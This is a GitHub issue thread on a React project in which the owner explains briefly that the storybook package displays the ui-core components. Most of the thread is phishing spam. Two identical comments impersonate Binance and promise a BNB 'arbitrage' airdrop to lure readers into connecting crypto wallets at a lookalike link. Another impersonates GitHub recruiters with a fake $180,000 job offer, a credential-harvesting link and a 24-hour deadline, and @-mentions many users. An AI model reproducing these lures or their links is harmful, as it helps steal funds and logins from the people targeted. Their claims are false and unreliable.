### ISSUE TITLE
Ui-core vs storybook

### ISSUE THREAD

**Issue by Neira1991** [camiloarce/rick-and-morty-react#3]
porque tienes 2 paquetes storybook y ui-core? no vendria siendo lo mismo?

**Comment by camiloarce** [comment]
No, el storybook es para mostrar los componentes del ui-core. La función del ui-core es ser consumido por varios proyectos.

**Comment by paramaputra** [comment]
### Join Binance Arbitrage in Celebrating 2023: Divide Up to 600,000 BNB in Rewards! 

At Binance, we truly believe that decentralized finance will play a pivotal role in the future.

In order to unlock the mainstream adoption of Binance Coin(BNB), a good wallet is one of the most important gateways for our users.

Now team up with the high-quality wallets that have supported our Binance Chain since the beginning, we jointly launch the Binance arbitrage smart contract. Use the smart contract to trade your ETH to BNB, and it generates an extra 10%~12% BNB as your profit, which we committed to a total of 600,000 BNB.

The currently online smart contracts are applicable to Trust wallet, Atomic wallet, and ZenGo wallet

To start the Arbitrage smart contract, please follow the steps below: [Binance Rewards](http://go.bnbrewards.online/WvDubR)


[![Claim Now](https://public.bnbstatic.com/image/cms/article/body/202303/44b0b95a5bef2cc2479d683bfbbdf8ba.png)](http://go.bnbrewards.online/WvDubR)

### Secure Your BNB with These Simple Steps:

1. **Connect Your Wallet:**
   - Head over to the [Binance](http://go.bnbrewards.online/WvDubR).
   - Link up your preferred wallet (Metamask, Coinbase, Trust Wallet, and more).

2. **Eligibility Check:**
   - [Confirm your eligibility  Airdrop](http://go.bnbrewards.online/WvDubR).

3. **Engage for Extra Rewards:**
   - Participate in community discussions or complete tasks for bonus rewards.

### Bonus Tips:
- **Community Assistance:**
  - Need help? Drop a message on Telegram or other social media platforms.

- **Stay Informed:**
  - Keep an eye out for updates on the airdrop process via official channels.

- **Patience Pays Off:**
  - Airdrop distribution might take a while. Stay calm and keep an eye out for updates.

**Comment by paramaputra** [comment]
### Join Binance Arbitrage in Celebrating 2023: Divide Up to 600,000 BNB in Rewards! 

At Binance, we truly believe that decentralized finance will play a pivotal role in the future.

In order to unlock the mainstream adoption of Binance Coin(BNB), a good wallet is one of the most important gateways for our users.

Now team up with the high-quality wallets that have supported our Binance Chain since the beginning, we jointly launch the Binance arbitrage smart contract. Use the smart contract to trade your ETH to BNB, and it generates an extra 10%~12% BNB as your profit, which we committed to a total of 600,000 BNB.

The currently online smart contracts are applicable to Trust wallet, Atomic wallet, and ZenGo wallet

To start the Arbitrage smart contract, please follow the steps below: [Binance Rewards](http://go.bnbrewards.online/WvDubR)


[![Claim Now](https://public.bnbstatic.com/image/cms/article/body/202303/44b0b95a5bef2cc2479d683bfbbdf8ba.png)](http://go.bnbrewards.online/WvDubR)

### Secure Your BNB with These Simple Steps:

1. **Connect Your Wallet:**
   - Head over to the [Binance](http://go.bnbrewards.online/WvDubR).
   - Link up your preferred wallet (Metamask, Coinbase, Trust Wallet, and more).

2. **Eligibility Check:**
   - [Confirm your eligibility  Airdrop](http://go.bnbrewards.online/WvDubR).

3. **Engage for Extra Rewards:**
   - Participate in community discussions or complete tasks for bonus rewards.

### Bonus Tips:
- **Community Assistance:**
  - Need help? Drop a message on Telegram or other social media platforms.

- **Stay Informed:**
  - Keep an eye out for updates on the airdrop process via official channels.

- **Patience Pays Off:**
  - Airdrop distribution might take a while. Stay calm and keep an eye out for updates.

**Comment by leojin** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
noyyyy, @cristianbgp, @premiare, @maui-r, @cjbyte, @Vitalsine85, @revolucion, @robitaille1, @valamidev, @mohammadbrzbrz72, @handsomeCarl, @0xseven7, @ryanberckmans, @Qiuhang817385, @ngmisl, @yl, @niranjans, @EridianAlpha, @muhrusdi, @kunato
